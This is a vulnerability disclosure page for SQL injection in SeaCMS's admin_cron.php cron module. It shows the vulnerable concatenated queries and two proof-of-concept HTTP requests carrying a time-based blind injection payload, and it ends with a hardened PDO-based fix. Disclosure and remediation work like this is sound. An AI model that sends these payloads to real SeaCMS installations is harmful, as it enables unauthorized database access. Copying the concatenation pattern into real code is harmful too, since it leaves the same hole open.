Submit #659883: SeaCMS v13.3.20250820 SQL Injection

Title: SeaCMS v13.3.20250820 SQL Injection
Description:

# Summary

SeaCMS v13.3.20250820 contains multiple SQL injection vulnerabilities in the admin panel's cron task management module (admin_cron.php).

# Details

## Root Causes

- Direct SQL Concatenation: User input is directly embedded in SQL queries without parameterization.
- Insufficient Sanitization: dhtmlspecialchars() only escapes HTML, not SQL.
- Multiple Injection Points: Different parameters in the same endpoint are vulnerable.

Injection Point 1 (resourcefrom)

```
// In PlanMode=0 block:
$rfromarr = explode('#', $_POST['resourcefrom']); // Unsanitized
$rid = $rfromarr[0];
$url = $rfromarr[1];
$dsql->ExecuteNoneQuery("INSERT ... VALUES('$rid', '$url')"); // Direct concatenation
```

Injection Point 2 (collectID)

```
// In PlanMode=4 block:
$filename = "autocollectnews.php#".$_POST['collectID']."#...";
$dsql->ExecuteNoneQuery("INSERT ... VALUES('$filename')"); // No sanitization
```

# POC

## PoC #1: Time-Based Blind via resourcefrom

```
POST /[admins'URL]/admin_cron.php?action=addCron HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Cookie: [Admin Cookie]

PlanMode=0&resourcefrom=00'XOR(0*if(now()=sysdate(),sleep(4),0))XOR'Z&...[other params]
```

Effect: Causes a 4-second delay if now()=sysdate() is true.

## PoC #2: Time-Based Blind via collectID (Multipart)

```
POST /[admins'URL]/admin_cron.php?action=addCron HTTP/1.1
Host: 127.0.0.1
Content-Type: multipart/form-data; boundary=----boundary

----boundary
Content-Disposition: form-data; name="collectID"

00'XOR(0*if(now()=sysdate(),sleep(4),0))XOR'Z
----boundary--
```
Source: https://github.com/Hebing123/cve/issues/93
User: jiashenghe (UID 39445)
Submission: 22/09/2025 12:22 (7 months ago)
Moderation: 26/09/2025 14:44 (4 days later)
Status: Accepted
VulDB entry: 326112 [SeaCMS 13.3.20250820 Cron Task Management /admin_cron.php resourcefrom/collectID SQL injection]
Points: 20
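
A hardened form of the two insert paths described in the report, as an added example that is not SeaCMS code and not the submitter's. PDO with in-memory SQLite stands in for the `$dsql` wrapper; the table `cron_demo`, the functions `parseResourceFrom` and `addCron`, the assumption that `rid` and `collectID` are numeric ids, and all sample inputs are constructed for illustration.

```php
<?php
// Added example, not SeaCMS code. Table and function names are hypothetical;
// PDO with in-memory SQLite stands in for the application's $dsql wrapper.

function parseResourceFrom(string $raw): array
{
    // The page shows explode('#', ...) into $rid and $url; assume $rid is numeric.
    $parts = explode('#', $raw, 2);
    if (count($parts) !== 2 || !ctype_digit($parts[0])) {
        throw new InvalidArgumentException('resourcefrom must be "<digits>#<url>"');
    }
    return [(int) $parts[0], $parts[1]];
}

function addCron(PDO $db, array $post): void
{
    // Values travel as bound parameters, never as part of the SQL text.
    $stmt = $db->prepare('INSERT INTO cron_demo (rid, target) VALUES (:rid, :target)');
    $mode = $post['PlanMode'] ?? '';
    if ($mode === '0') {
        [$rid, $url] = parseResourceFrom((string) ($post['resourcefrom'] ?? ''));
        $stmt->execute([':rid' => $rid, ':target' => $url]);
    } elseif ($mode === '4') {
        $id = (string) ($post['collectID'] ?? '');
        if (!ctype_digit($id)) { // assumption: collectID is a numeric id
            throw new InvalidArgumentException('collectID must be digits only');
        }
        // The trailing "..." is elided on the page and stays elided here.
        $stmt->execute([':rid' => 0, ':target' => "autocollectnews.php#{$id}#..."]);
    } else {
        throw new InvalidArgumentException('unsupported PlanMode');
    }
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE cron_demo (rid INTEGER, target TEXT)');

// Constructed inputs: the quote inside the URL is stored as data, not parsed as SQL.
addCron($db, ['PlanMode' => '0', 'resourcefrom' => "7#http://example.test/feed?q=o'brien"]);
addCron($db, ['PlanMode' => '4', 'collectID' => '12']);
// Constructed malformed ids: rejected before any statement is executed.
foreach ([['PlanMode' => '0', 'resourcefrom' => "7'#http://example.test/"],
          ['PlanMode' => '4', 'collectID' => "12'"]] as $bad) {
    try {
        addCron($db, $bad);
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;
    }
}
print_r($db->query('SELECT rid, target FROM cron_demo')->fetchAll(PDO::FETCH_ASSOC));
```

Type checks cover the fields with a known shape, and parameter binding covers the free-form URL, which is why HTML escaping is not needed on the way into the database.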
